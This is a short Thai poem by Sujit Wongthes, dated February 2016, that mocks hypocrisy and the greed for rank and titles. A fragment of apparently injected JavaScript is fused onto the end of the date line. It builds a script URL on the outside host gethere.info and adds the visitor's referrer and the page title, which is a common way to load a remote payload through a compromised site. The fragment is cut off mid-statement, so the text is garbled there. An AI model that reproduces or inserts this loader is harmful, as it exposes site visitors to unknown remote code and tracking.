สากกับศีล

 

มือถือสาก ปากถือศีล

ตีนเหยียบความมักน้อยความถูกต้อง

ยศช้างขุนนางพระแย่งประคอง

รากหญ้าต้องลดละเลิกหลงลาภยศ

 

สุจิตต์ วงษ์เทศ

พฤหัสบดี 18 กุมภาพันธ์ 2559s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;